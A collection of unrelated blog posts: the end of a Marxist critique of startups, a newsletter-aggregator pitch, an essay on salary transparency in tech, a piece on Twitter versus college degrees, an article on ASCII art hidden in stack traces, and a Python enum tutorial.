Startups love to save the world, but look at the state of the world now—is this what it’s like to be saved? Is the world even a little bit better because of startups like Instagram, Uber, and Peloton? Startups are spaces of remarkable innovation, and they are experts at channeling the multivoicedness of code—just look at the network of voices that GitLab channels (visualized below). But under capitalism, these voices are distorted and constrained, and they cry “growth, growth!” as venture capitalists and founders demand user acquisition, market share, and revenue—in a word, they demand access to capitalist accumulation.
Systems diagram published by GitLab
The startup founder, no matter how much they claim to love code, love humanity, or love the thrill of the hustle (and they may even believe themself when they say it), loves the growth of capital most of all. The tech founder is a capitalist proper, but capital does not love them back; capital cannot love at all, and the odds are stacked against our hero capitalist. “The larger capitals beat the smaller … It always ends in the ruin of many small capitalists, whose capitals partly pass into the hands of their conquerors, partly vanish” (Marx 1867, 621). Capital accumulates and concentrates, and in the midst of frothy competition, the startup either dies or gets acquired by Facebook or Google, leaving nothing behind but a bullet point on LinkedIn and a blog post signifying an incredible journey. So much for changing the world.
What is to be done?
To revisit that ambitious question we set out to answer, where did it all go wrong? What got us into this mess, this tool-assisted speedrun of accumulation and exploitation? The trick is that we have not been studying software on its own—we’ve established that computers and computer code are veritably saturated with human touch, human voices, and human thought. Software cannot be divorced from the human structures that create it, and for us, that structure is capitalism. To quote Godfrey Reggio, director of Koyaanisqatsi (1982), “it’s not the effect of, it’s that everything exists within. It’s not that we use technology, we live technology. Technology has become as ubiquitous as the air we breathe, so we are no longer conscious of its presence” (Essence of Life 2002).
Where did it all go wrong? At some point, capital became the answer to every question—what to produce, how to produce, for whom to produce, and why. When software, that ultimate solution in search of a problem, found the questions answered only by capital, we lost our way, caught in capital’s snare.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
I don’t know :)
Consider donating to a local community bail fund. Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
title: On building a newsletter aggregator - SubscriptionZero Blog
description: A newsletter aggregator allows you to combine your newsletters so you can read them all in one place.
image: https://blog.subscriptionzero.com/wp-content/uploads/2020/06/3646374-1024x683.jpg
Newsletters are great for keeping up with what’s happening around you. Their authors do a fantastic job of curating hours of reading material into a well-written digest. However, for readers, consuming newsletters is still not ideal! In this post, I’ll propose a solution that I think will benefit both readers and authors. It’s called a newsletter aggregator.
The problem with newsletters
I recently subscribed to Trends.vc. The author spends around 30 hours every week on research and comes up with a report about market trends in the startup world. To top it all off, it’s written in extremely simple and concise English.
But here’s the thing: none of my friends are subscribed to it. Why? Because signing up for a newsletter means giving out your personal email. That’s a big source of friction!
First, you’re giving away everything that’s tied to your email. There are lots of tools out there that will build your full persona from your email. So you’re not just giving out an email address.
Second, test driving a newsletter is very demanding. You sign up, wait for the confirmation, wait for the first email, wait for the second one, and only then decide if you like it or not. That’s easily a 2-week trial!
But more importantly, for 2 weeks you’ve been receiving something you didn’t want on top of your important emails. That’s an enormous investment for a trial.
Third, newsletters land in your mailbox. So by definition, they are fighting – even unwillingly – for a place on top of your important emails. For as long as you’re subscribed!
Newsletters, then, have incredible value. Their distribution, however, is lacking.
So how can we fix that?
To start with, inboxes could get better at sorting emails. But that’s a lot harder than it sounds.
Newsletters could also choose another medium for distribution. The problem here is that email is the best distribution channel there is. Nothing beats a place in your audience’s mailbox.
There is however, another solution that has been getting quite some attention lately. You’ve probably heard that term thrown here and there: newsletter aggregator.
Enter the newsletter aggregator
The term newsletter aggregator isn’t well defined yet, but I’d like to start making it official. To me, a newsletter aggregator needs to do a few things:
Bypass your mailbox (for the sake of decluttering)
Combine newsletters from different senders
Categorize newsletters
Send email updates on a regular basis (weekly, daily or every X days)
Bonus: provide a better interface for reading newsletters
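As a sketch of how those requirements might fit together in code—purely hypothetical Python, with names of my own invention rather than anything from SubscriptionZero’s actual implementation:

from dataclasses import dataclass, field

@dataclass
class Issue:
    sender: str
    subject: str
    body: str
    category: str = "uncategorized"

@dataclass
class Aggregator:
    # Issues land here instead of in the reader's personal mailbox.
    issues: list = field(default_factory=list)

    def receive(self, issue: Issue) -> None:
        # Naive categorization by sender domain; a real service
        # would do something smarter.
        issue.category = issue.sender.split("@")[-1]
        self.issues.append(issue)

    def digest(self) -> dict:
        # Combine issues from different senders into one update,
        # grouped by category, ready to send on whatever schedule
        # the reader chooses.
        grouped = {}
        for issue in self.issues:
            grouped.setdefault(issue.category, []).append(issue.subject)
        return grouped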
This is still early so the list will grow as newsletter aggregator apps mature. I sincerely believe we are at the dawn of a new era with newsletter aggregators.
And I’m excited to be part of it. For the past year, I’ve been building SubscriptionZero which is aiming to solve this very problem.
SubscriptionZero allows you to read and organize your newsletters outside your mailbox. When you log in, you’ll receive an email address that you can then use to subscribe to newsletters. These will then appear in the app’s reader, which is specifically designed for reading newsletters.
It solves the 3 problems I mentioned above:
You don’t hand out your personal email
You don’t have unwanted emails fighting for the top spot in your inbox
You don’t have newsletters you actually like fighting for the top spot in your mailbox
title: Why talk about compensation?
description: There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was…
There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was some backlash1, saying that people sharing their salaries is basically just flexing, and instead of bragging on Twitter, people should just go out and do something that actually helps, like unionizing.
While I don't think that the current iteration of people sharing their salaries on Twitter is as useful as it could be, I think that it's incredibly important for people to talk about their pay, and I want to tell you a few stories about why. To start with, we'll have to go back a decade - a group of employees of tech companies including Google, Apple, and Intel filed a class action lawsuit, stating that their employers colluded in a wage-fixing agreement to keep salaries down.
Steve Jobs was at the source of much of the wage-fixing, becoming angry when companies hired Apple employees - he wrote to Google co-founder Sergey Brin regarding the Safari team:
if you hire a single one of these people that means war.
When a Google employee referred an Apple employee for a job, Steve Jobs emailed Eric Schmidt, who responded by firing the Google employee who had sent the referral. Google's staffing director said, upon hearing about the situation, that the employee "will be terminated within the hour," and to "Please extend my apologies as appropriate to Steve Jobs."
When Palm, Inc refused to participate in the wage-fixing agreement, Steve Jobs wrote:
This is not satisfactory to Apple.
I'm sure you realize the asymmetry in the financial resources of our respective companies when you say: "we will both just end up paying a lot of lawyers a lot of money."
My advice is to take a look at our patent portfolio before you make a final decision here.
A Senior Vice President at Google wrote about compensation that:
[The] long-term ... right approach is not to deal with these situations as one-offs but to have a systematic approach to compensation that makes it very difficult for anyone to get a better offer.
As a result of driving wages down for more than half a decade, the companies paid out around $3,840 to each affected employee. I'll let you do the math on that one.
So I think that it's obvious that employers have shown an interest in keeping salaries down, and one of the tools used to do that is making sure people don't have information about how much their coworkers are being paid. And while tech workers have it pretty good in terms of compensation (at least here in the States), the number of people I know who save their company tens or hundreds of millions of dollars, and as a reward are given raises worth less than a tenth of a percent of what they saved, makes me think that it's worth talking about who's capturing the value of our labour.
But how we talk about our salaries matters - just knowing that other people are out there, making four or five times as much as you are doesn't help your situation much unless you're able to negotiate that raise for yourself.
A friend of mine recently learned that one of his coworkers made around 1.6x what he did. If the story ended there, it wouldn't be too interesting. But instead of just leaving for greener pastures, or negotiating a raise for himself, he started talking to his coworkers about how much they made. As it turned out, everyone except one person made about the same amount - why was that person's work (doing the same work on the same project team) worth 60% more than everyone else's? Just a couple months after talking frankly about compensation, the highly-paid coworker and my friend negotiated for an extra week of vacation (not just for themselves, but for everyone at the company). And it's not just vacation - collectively, everyone at the company negotiated for oncall compensation as well. After talking to his coworkers about their compensation, and collectively bargaining for fairer compensation, my friend has now gone on to sign an offer at a different company for significantly more money - all because of open conversations about salary and working environments, and collective action to improve that for everyone.
By talking with our coworkers, being open about our salaries, and bargaining collectively, we can not just improve our own conditions, but also lift up everyone around us. People have fought and been killed for our right to openly discuss compensation, and I think it's worth exercising that right. So talk to your coworkers, and if you see me around the office or in person, know that I'm happy to talk about how much I'm paid and what I know about salary bands at any place I've worked.
By talking to your coworkers and building solidarity, we can build a fairer and better world together.
If you're in NYC and want to meet up over lunch/coffee to chat about the future of technology, get in touch with me.
I'm not going to link any specific tweets, but I saw this from a few places. ↩
title: 7.5 Reasons Why Twitter Will Replace Your College Diploma — Brendan Cahill
author: Brendan Cahill
description: Why a strong Twitter presence might do more for your professional success than a college diploma will.
image: http://static1.squarespace.com/static/5e860d480e72f6236141f59a/5ee27ca405e3dd0d022caee9/5ee3a3c20c342a1acf777ad5/1591976971945/Screen+Shot+2020-06-10+at+12.54.04+PM.png?format=1500w
Why a strong Twitter presence might do more for your professional success than a college diploma will.
I wouldn’t say I am a Titan of Twitter, but with less than 3K followers I have built a decent following that I leveraged at one point into a 6-figure business (you can read about that one’s unfortunate demise here), and I am leveraging it once more to build new ones.
As a private coach, I’ve been able to develop connections with coaches at top-tier college football programs and with current and former NFL Pro Bowl players and coaches, and to generate countless leads and referrals for my coaching business, all through Twitter.
In 2020 it isn’t uncommon during an informal job interview for the interviewer to simply say “Follow me on Twitter, I’ll check your stuff out.”
Right now your brand is being built. It can be built by default by the company you work for or the school you attend, or you can build it by design, rally your tribe, and create more opportunities for yourself than you ever could have dreamed a college diploma alone would give you.
The average American education path looks like this: Get good grades to get into a good high school. Get into a good high school to get good grades to get into a good college. Get into a good college to get a good job. Get a good job to have a good life.
While I am a vocal critic of college, college was very good to me. I made lifelong friends, had fun, was mentored by great professors and met my future wife there. As a dating service and sleep-away camp for young adults, college is unmatched.
But, as good an experience as I had in college, it is impossible to ignore the combined impact that the internet, social media and brand building have all had on tearing down the monopoly that higher education once had on the American Dream.
Twitter might be the biggest disruption of them all.
In the 20th century you went to school to train to work for a famous brand. In the 21st century you are the brand that companies want to work for.
A brand is simply what someone expects from you, or your reputation.
Pre-Twitter this reputation relied on bosses and supervisors to develop for you. Now, Twitter allows you to cultivate a specific reputation with every tweet, like, retweet or comment.
In the 20th century people went to school to train to work for a famous brand.
To do this, they tried their best to go to schools with famous brand names like Harvard, Yale, or Stanford. The more famous the brand of school you went to, the more famous the brand of company you could work for. If you wanted to work for Apple, you stood a better chance as a Stanford graduate than as a Glendale Community College graduate.
Now, you get to decide what your reputation is. And that’s scary for a lot of companies.
We can’t read minds — yet. But, Twitter is very close.
In a few taps you can see every post, every comment, every like and every piece of content a person has ever created. You can peer into the depths of their mind and soul to see what makes people tick.
Even cooler, you can decide to drop into that thought thread and add your own valuable insight into someone’s running conversation with other like-minded people.
And, if those people resonated with anything you said, they too might drop into your own thought threads, comments and DMs to begin building a relationship with you.
If you’re looking to understand the hopes, dreams and fears of your ideal market, Twitter is a great starting point.
(As an aside — if you can find this much information out publicly on Twitter just imagine what they’ve got on you privately!)
Columbus might have proved the Earth was round in 1492 but Jack Dorsey made it flat again in 2006.
Twitter has removed all gatekeepers between you and people you want to interact with.
The Silicon Valley term for this is “disintermediation” — or removing intermediaries between people and brands.
Entire industries are based on positioning themselves at information choke points and then charging for access to that information.
Higher education positioned itself at the choke point of “how do I make sure I get a good job?” and charged handsomely for access to that information.
Now, there are 15-year-old YouTube stars making 7 figures through their iPhones. It’ll be tough to convince them of the value proposition of attending a $70K/year liberal arts college when so many graduates end up working at Starbucks for minimum wage for their first few years out of college.
In theory, there is now no real barrier between you and Trump. If you tweet something outlandish enough his way, he could tweet you back and drive the next 24hr global news cycle. This is both very cool and scary.
Secretaries, mid-level management and other gatekeepers now have less power than ever over who can reach their bosses. If you have a compelling enough offer and someone sees enough value in it you can get through to anyone.
4. Twitter Is A Hyper Network
You’re just one retweet away from going viral.
Metcalfe’s law states that a network’s value grows with the square of its number of users: every additional node makes the whole network more valuable.
When the telegraph first came out, it was not very valuable if only one person had it. But, the more people who adopted the telegraph the more valuable it became.
And, so it is with Twitter.
If only 10 people used Twitter it would not be very valuable. But with 321 million active users (as of February 2019) and a $3.5 billion valuation, its value is undeniable.
Overnight you may be retweeted by someone with 100K followers which then gives you 2,000 new followers, and 80 DMs asking you about collaborating on your new business.
Twitter isn’t bound by physics. It is a force multiplier that lets you connect with anyone, anywhere, at any time.
5. Twitter Is A Free Focus Group
Empowered by distance and not knowing you personally, Twitter will viciously slay any idea it doesn’t like. This will save you a lot of time and frustration in market research.
You can accomplish in one tweet market research that might have cost the Mad Men of Madison Avenue $100K+ and several months of work.
Personally, I like posting a generic tweet: “Hey guys, I’m looking for 8–10 people who are serious about learning a bit more about how to xyz. DM/comment if you’d like to test run my new course.”
Then, I’ll make a private DM group (you can add up to 50 members on a single Twitter DM right now) and begin the conversation there.
6. Twitter Builds Your Tribe
Your audience members may not yet be clients or customers, but building an audience is the first step to finding them.
Some ESPN personalities have more followers than ESPN itself does. Some NY Times reporters have more followers than the NY Times does.
Pre-Twitter, if you lost your job that was it. You would have to start over at a new company — low man on the totem pole. Now, even if you get fired from your job, you will still have your online audience that you can leverage to create revenue generating opportunities for yourself.
Better yet, losing your job always makes for a great read. You can turn it into your flagship blog post that will build your credibility and authority in your audience’s eyes as someone who knows how to recover from job loss, start their own business and so on.
Twitter is the perfect first stop on building your audience and eventual sales funnel.
Twitter lets you take your following with you.
Across America the unemployment rate is through the roof. What if, when you were let go because of COVID-19, you simply shrugged, flipped open your Twitter account with 10K+ active audience members, tweeted out that you were starting a new business or launching a new course, and it made you $5K?
The days of businesses having a monopoly on your brand are over. In fact, businesses are scared to death of the power that their employees’ personal brand can now wield upon their companies. In the age of each person having their own unique brand, the faceless corporation will lose.
7. Twitter DM is the New Email
Right now there are multi-million dollar deals, scholarship offers, and business discussions occurring on Twitter DM.
The DM is today what email was 15 years ago — an uncluttered direct line of communication between you and someone who can say “yes” to your dream. Like the dark web, 98% of what goes on inside Twitter occurs here.
In theory, once someone follows you back they are open to you DM’ing them. If you do DM someone, I would recommend the following guidelines:
Seek to give to that person first. Do you have something valuable that might benefit a project they are working on? Could you connect that person to someone else that they might find beneficial to know?
Seek to learn from that person first. Everyone enjoys answering questions about things they are passionate about. Craft 2–3 succinct and insightful questions to ask regarding a post, project or podcast you heard that person on.
Give it time and space. Just because you were responded to once via DM doesn’t mean you are best friends. I like a span of 2–4 days in between DMs when trying to build a relationship with a new person.
DMs are not a replacement for conversation but rather the first step to having one. When possible, transition your DM conversation “offline” to the phone or email. With every cell phone number or email address that person grants you, you build a little bit more trust.
7.5 Twitter Won’t Make You Happy
It will just make you more or less of what you already are.
10K+ followers never made anyone happy. And, money only solves money problems. Even if you are making some, it won’t change who you are as a person.
Twitter and social media are great at building connections but not great at building conversations. The magic of Twitter comes when you can leverage a connection made on its platform into a real-life relationship, mentorship or friendship.
In the future everyone is going to be their own brand that companies will apply to work for. Twitter is just one of numerous other platforms where people will be able to intentionally craft that brand, make money from it and ultimately live life on their terms.
title: Stack Trace Art description: Hiding ASCII art, broken into individual lines deep in source code, to have them emerge as errors cascading through the call stack image: https://esoteric.codes/uploads/0b7abb70-edc8-4806-b916-199bb2a6f3ea-stacktraceart1.png
Stack Trace Art is a kind of secret drawing hidden in pieces within a program, waiting to be revealed at the right moment when invoked as an error. Igor Rončević, a Croatian programmer, discovered that you can throw an error which, as it flows through the call stack, pieces together ASCII art revealed in the stack trace. He has not only put together a series of these, but created a tool to allow others to exploit this idea.
The stack trace is a textual representation of the call stack; the flow of subroutines calling other subroutines at any moment in a running program. Usually the stack trace is seen by programmers debugging a piece of code in their development environment, or in an error log when something has gone wrong. They are lists of methods and line numbers and not terribly interesting to look at unless you're invested in the program they belong to. Unless you're viewing ones thrown by Rončević, which are ribbons, cats, or ASCII graffiti lettering.
It's a simple idea, but one that is not so easily carried out. The error itself is nothing special: a simple C# exception. The magic happens in the class throwing the exception, which has a set of methods the error flows through: one for each line of the drawing, with the ones closer to the error further up the image and so deeper in the chain. If the image were completely filled with visible characters, this would not be hard to do: we could have a series of function names with variations of aaaaaaaaaaaaaaaaa. However, that's not enough to build the cat image above: we would need to find a way to represent spaces. Rončević's solution was to find a Unicode space that C# would not recognize as a space but something else (this is very much a Microsoft-oriented project -- actually not so much, see update below*). This symbol is the Hangul Filler character, as he explains in his post His Majesty, Hangul the Filler, his ode to the symbol that makes it all possible. Hangul Filler is a control character used in representing less common Korean characters. Starting a sequence with Hangul Filler marks the following characters as intended to be combined into a single character made up of those components, as opposed to individual letters. However, as modern Unicode offers all the combinations, even of archaic signs, of these symbols, the Filler code is now essentially a legacy symbol.
The green and blue above are the name of a method, part of the call chain
Used with Western characters, it simply looks like a space, and is obscure enough that the C# people haven't (yet) eliminated it as a valid naming character.
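To make the mechanism concrete, here is a minimal illustrative sketch, written in Python rather than C# and with plain underscores standing in for the Hangul Filler trick. One caveat: Python prints the outermost frame first, so the first call in the chain becomes the top line of the image.
# stack_trace_art_sketch.py (an illustrative sketch, not Rončević's tool)
class TraceArt:
    def line1___A_CAT_SAYS___(self):
        self.line2_____MEOW_____()
    def line2_____MEOW_____(self):
        raise RuntimeError("surprise")  # the error that reveals the drawing

TraceArt().line1___A_CAT_SAYS___()
# The resulting traceback lists line1___A_CAT_SAYS___ first and
# line2_____MEOW_____ beneath it: the method names themselves are the picture.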
This approach, of using the structure of code-based systems for performance, is similar in spirit to projects like PingFS. Even more so, it resembles the project IDN by JODI, which similarly breaks down a sequence into single lines (in this case urls), and uses the location bar of the browser as the place of performance. It similarly splits up the content (even when the content is just a series of redirects) across different sites. It also resembles the project Summer by Olia Lialina, which takes apart a gif and puts each frame onto a different artist's website, to be recombined into an animation in the browser, just as the stack trace recombines function names into a picture.
In both pieces, a single work is broken into segments to be re-assembled through unusual use of an existing technology: in Stack Trace Art (which I'll call STA from here on out), through the IDE itself. Summer emphasizes the filmic quality of the gif, splitting it into individual frames, much as STA splits the individual lines of ASCII art back into lines of text. It's also filmic in that its "projector speed" may speed up or slow down depending on internet connectivity and how quickly it can download each frame from a different site. While both Summer and STA are clever hacks that provide artistic possibilities, the difference in emphasis between the two works serves as a telling contrast between artist and hacker approaches. This is particularly interesting with a hacker piece that's explicitly presented as art, and an artwork by Lialina, who describes herself as a tinkerer, and is very interested in the hobbyist web aesthetic and hacker styling (she wrote this wonderful piece about the Prof. Dr. Style that still dominates some university sites), and claims to not have considered herself an artist until the Dutch Electronic Arts Festival printed the title on her nametag in 1996.
Lialina's approach is more artist-like in the way it packages its idea. Her work is dependent on many artists contributing web space (and web uptime -- any frame going down might cause the animation to freeze). But it is a singular vision of one artist: Lialina produced the individual frames and it is ultimately of her design; the other artists lend material support but they do not re-interpret the work by, say, putting their own image on the swing on one of the frames. The idea is made understandable through its cohesive vision.
Rončević does not even attempt to create the single really cool piece that encapsulates his idea. None of the ASCII art he chose to use in STA is particularly interesting on its own; it was chosen to collectively show the potential of using the tool on a variety of 2D textual content. His focus is on making useful code so that others can easily generate their own version of Stack Trace Art, using his library, or by simply following his example. This is the hacker approach; it's more open-ended, and more openly invites others to run with the idea.
In fact, Rončević seems to doubt that he could really have been the first to have discovered this technique. He has quite a long post asking if others have created something similar, asking if there is a Lobachevsky to his Bolyai. Looking past the self-comparison with some of the greatest mathematical minds of the 19th century, the thought is essentially: has really no one else thought to do this weird but really cool thing I've discovered?
It's very possible he was the first (STA is a very cool idea but a very weird way to use code!). The kind of play at work here, misusing tools to do something entirely new, is familiar to both artists and hackers. However, the answer could be that his Lobachevsky doesn't want to be found, and this leads to what I think is the most interesting potential of the work.
Stack traces have a feeling of intimacy between the programmer and a piece of code; it's what's on your screen when you dig deep into a problem to discover the behavior of code and the intentions of the coder behind it (even when that coder is yourself some time ago, with those intentions now forgotten). It's an abstract representation in service of a complex mental process. And I think STA would be best experienced when stumbled onto by accident: a piece of code backfires, you dig into it, and suddenly some crazy image that seems simply impossible to be where it is appears in the stack trace window, breaking you out of the interface. Here I'm thinking of it as a cousin to work like Joseph Moore's Meaning in Mistakes. It's a weird idea already, and I think it gains a lot of power served in an unexpected context.
* Update (9/18/18): While the implementation linked to above is Microsoft-specific, this is an idea that transcends languages. It's also been implemented in node.js by Saša Matijašić.
title: Why You Should Use More Enums In Python description: A gentle introduction to enumerations in Python author: Florian Dahlitz image: https://florian-dahlitz.de/static/images/blog/why-you-should-use-more-enums-in-python/why-you-should-use-more-enums-in-python-m.jpg
Introduction
In this article, you will learn what enums are and how to create and work with them.
Furthermore, you will learn why you should use them more often in your day-to-day coding.
Note: The code snippets used in the article can be found on GitHub.
What is an enum?
enum stands for enumeration and refers to a set of symbolic names, which are called enumeration members.
These enum members are bound to unique, constant values.
You can iterate over an enumeration and compare its members by identity (Python’s is operator).
The following code snippet shows you a simple example of an enum Colour:
# colour.py
from enum import Enum
class Colour(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3
We imported the Enum class from Python’s enum module.
It serves as a base class for defining new enumerations in Python.
Subsequently, a new enum called Colour is implemented having three enum members: RED, GREEN, and BLUE.
Note: Although the class syntax is used to define new enumerations, they aren’t normal Python classes.
If you want to know more about it, check out the How are Enums different? section in the module’s documentation [1].
Let’s see how enums behave when used.
# previous colour.py code
c = Colour.RED
print(c)
print(c.name)
print(c.value)
print(c is Colour.RED)
print(c is Colour.BLUE)
We extended the colour.py script by assigning the member Colour.RED to the variable c.
Furthermore, we print the string representation of Colour.RED, its name and value.
Additionally, we compare c‘s identity with Colour.RED and Colour.BLUE.
$ python colour.py
Colour.RED
RED
1
True
False
Running the script reveals that c is indeed Colour.RED, with RED as its name and 1 as its value.
Note: We used the is operator to compare the variable c with the different enum members.
Keep in mind that enums can only be compared to enums and not to integers, even though the enum member values are integers [2].
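A small sketch (with hypothetical values) makes this behaviour visible:
# compare.py (illustrative)
from enum import Enum

class Colour(Enum):
    RED = 1
    GREEN = 2

print(Colour.RED is Colour.RED)    # True: identity comparison works
print(Colour.RED == Colour.GREEN)  # False: equality between members works too
print(Colour.RED == 1)             # False: a plain Enum member never equals an int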
Iterating over the members of an enum
Enumerations have a special attribute called __members__, which is a read-only ordered mapping of names and members.
Utilising __members__ allows you to iterate over an enum and print the members as well as their corresponding names.
# iterate.py
from enum import Enum
class Colour(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3

for name, member in Colour.__members__.items():
    print(name, member)
$ python iterate.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
You might ask yourself why we did not simply do something like:
for member in Colour:
    print(member.name, member)
For the example at hand, both approaches produce the same result.
However, if you have an enumeration that also has aliases, only the approach using __members__ will print the aliases as well.
Check out the following example:
# iterate_alias.py
from enum import Enum
class Colour(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3
    ALIAS_RED = 1

for name, member in Colour.__members__.items():
    print(name, member)

print("="*20)

for member in Colour:
    print(member.name, member)
$ python iterate_alias.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
ALIAS_RED Colour.RED
====================
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
Automatic values
In the previous example, we assigned integers to the symbolic names RED, GREEN, and BLUE.
If the exact values are not important, you can use the enum.auto() function.
Behind the scenes, the _generate_next_value_() method is called to generate the values for you.
# auto.py
from enum import auto
from enum import Enum
class Colour(Enum):
    RED = auto()
    GREEN = auto()
    BLUE = auto()
c = Colour.RED
print(c.value)
It chooses a suitable value for each enum member, which will (most of the time) be the same integers we used before.
$ python auto.py
1
However, the _generate_next_value_() method can be overridden to generate new values the way you like:
# overwritten_next_values.py
from enum import auto
from enum import Enum
class AutoName(Enum):
    def _generate_next_value_(name, start, count, last_values):
        if len(last_values) > 0:
            return last_values[-1] * 2
        return 2

class Colour(AutoName):
    RED = auto()
    GREEN = auto()
    BLUE = auto()
c = Colour.RED
g = Colour.GREEN
b = Colour.BLUE
print(c.value)
print(g.value)
print(b.value)
$ python overwritten_next_values.py
2
4
8
Extending an enum
Being Python classes, enums can have any (special) methods just like all other classes.
Consider the following example.
# extending.py
from enum import Enum
class Colour(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3

    def __str__(self):
        return self.name

    def colorize(self):
        return f"Let's paint everything in {self.name.lower()}"
c = Colour.RED
print(c)
print(c.colorize())
We extended the Colour enum with a new method colorize() that returns a string based on the member’s name.
Furthermore, we override the __str__() dunder method to return the member’s name.
$ python extending.py
RED
Let's paint everything in red
Kinds of enums in Python
Besides Enum, Python provides three derived enumerations out of the box:
IntEnum
IntFlag
Flag
We will have a look at all three of them.
Keep in mind that you are free to implement your own derived enumerations based on Enum.
Implementing your own enumeration will not be covered in the article.
IntEnum
We already know that we can compare enum members using Python’s identity operator.
However, the Enum class does not provide ordered comparisons even though integers are used as values for the enumeration members.
Let’s have a look at the following example.
# comparison.py
from enum import Enum
class Colour(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3

r = Colour.RED
g = Colour.GREEN
print(r < g)
Executing the script at hand results in a TypeError.
$ python comparison.py
Traceback (most recent call last):
File "/home/florian/workspace/python/why-you-should-use-more-enums-in-python-article-snippets/comparison.py", line 14, in <module>
    print(r < g)
TypeError: '<' not supported between instances of 'Colour' and 'Colour'
The only thing you can do is make use of equality comparisons like == and !=.
Additionally, comparing enum members with any non-enumeration value is not supported.
However, the derived enumeration IntEnum does provide ordered comparisons as it is also a subclass of int.
In order to make our example work, we need to import the IntEnum class instead of Enum and derive Colour from it.
We do not need to change anything else.
# comparison.py
from enum import IntEnum
class Colour(IntEnum):
...
$ python comparison.py
True
IntFlag
The IntFlag class is pretty similar to the IntEnum class with the exception that it also supports bitwise operations.
By supporting bitwise operations, I mean that it is possible to combine two enum members, with the result being an IntFlag member, too.
All other operations on an IntFlag member result in the loss of IntFlag membership.
Let’s have a look at an example.
Assume that we grant permissions to users so that they can read, write and/or execute a certain file.
We create an enumeration Permission with the members R (read permission), W (write permission), and X (execute permission) respectively.
If we have a user, who should have read and write permissions for a certain file, we can combine both using the | operator.
# permissions.py
from enum import IntFlag
class Permission(IntFlag):
    R = 4
    W = 2
    X = 1
RW = Permission.R | Permission.W
print(RW)
print(Permission.R + Permission.W)
print(Permission.R in RW)
$ python permissions.py
Permission.R|W
6
True
Flag
The Flag class also provides support for bitwise operations but does not inherit from int.
In fact, it is like Enum but with support for the bitwise operations.
If we take the Colour enum from the beginning, we could easily mix the colour white based on the other three colours.
# colour_flag.py
from enum import auto
from enum import Flag
class Colour(Flag):
    RED = auto()
    GREEN = auto()
    BLUE = auto()
    WHITE = RED | GREEN | BLUE
print(Colour.WHITE.name, Colour.WHITE.value)
$ python colour_flag.py
WHITE 7
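Since WHITE combines all three flags, the in operator reports whether a given colour is part of the mix. A small illustrative sketch (the file name is mine):
# mix_check.py
from enum import auto
from enum import Flag
class Colour(Flag):
    RED = auto()
    GREEN = auto()
    BLUE = auto()
    WHITE = RED | GREEN | BLUE
print(Colour.RED in Colour.WHITE)  # True: RED is part of the WHITE combination
print(Colour.RED | Colour.BLUE)    # a combined Colour member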
Why do I need enums?
At this point, we have an understanding of what enums are and how we can create them in Python.
Furthermore, we are able to compare and work with them.
However, we have not yet seen why we need enumerations and why we should use them more often.
The examples we had a look at were pretty simple.
Although the Permission enumeration seems pretty useful, the Colour enum does not.
Why would you use these enumerations in your code?
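The function in question is not reproduced in this version of the article; a plausible reconstruction, with the status codes left as bare magic numbers, might look like this:
# response_code.py (before introducing the enum)
from http.client import HTTPResponse
def evaluate_response(response: HTTPResponse) -> str:
    if response.status == 404:
        return "Not Found"
    elif response.status == 502:
        return "???"  # quick: what does 502 stand for?
    elif response.status == 400:
        return "???"  # and 400?
    else:
        return "Unknown Status Code"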
We defined a function that takes an HTTPResponse object and returns a string based on the status code of the response.
You may know that 404 is the status code for Not Found, but do you know the meaning of 502 and 400?
These are only two of the lesser known status codes, and many more are out there.
It is hard to read and understand the code without a web search.
This is where enumerations come into play.
We can implement our own custom enumeration to lend more meaning to the code.
# http_code_enum.py
from enum import IntEnum
class HTTPCode(IntEnum):
    BAD_REQUEST = 400
    NOT_FOUND = 404
    BAD_GATEWAY = 502
Here, an IntEnum is used because we want to be able to compare its members with integers.
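As a quick illustration (this check is my own, assuming the http_code_enum.py module above):
# check_http_code.py
from http_code_enum import HTTPCode
print(HTTPCode.NOT_FOUND == 404)                  # True: IntEnum members equal their int values
print(HTTPCode.NOT_FOUND < HTTPCode.BAD_GATEWAY)  # True: ordered comparisons work as well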
Now, the function from before looks like this:
# response_code.py
from http_code_enum import HTTPCode
from http.client import HTTPResponse
def evaluate_response(response: HTTPResponse) -> str:
    # HTTPResponse exposes the status code as the .status attribute
    if response.status == HTTPCode.NOT_FOUND:
        return "Not Found"
    elif response.status == HTTPCode.BAD_GATEWAY:
        return "Bad Gateway"
    elif response.status == HTTPCode.BAD_REQUEST:
        return "Bad Request"
    else:
        return "Unknown Status Code"
In essence, if you have magic numbers in your code, you should definitely consider either assigning them to variables or grouping them together into an enumeration.
This way, your code’s readability increases a lot.
This is especially true if you want to write tests for your code.
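For instance, a test can build a fake response object and compare against the readable enum member instead of a bare number. A minimal sketch; FakeResponse is a stand-in of my own, not part of the article’s code:
# test_response_code.py
from http_code_enum import HTTPCode
from response_code import evaluate_response
class FakeResponse:
    status = HTTPCode.NOT_FOUND  # stands in for http.client.HTTPResponse
assert evaluate_response(FakeResponse()) == "Not Found"
print("ok")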
Summary
Congratulations, you have made it through the article!
While reading the article you learned what enums are and how you can create them in Python.
Furthermore, you learned how to compare and work with them.
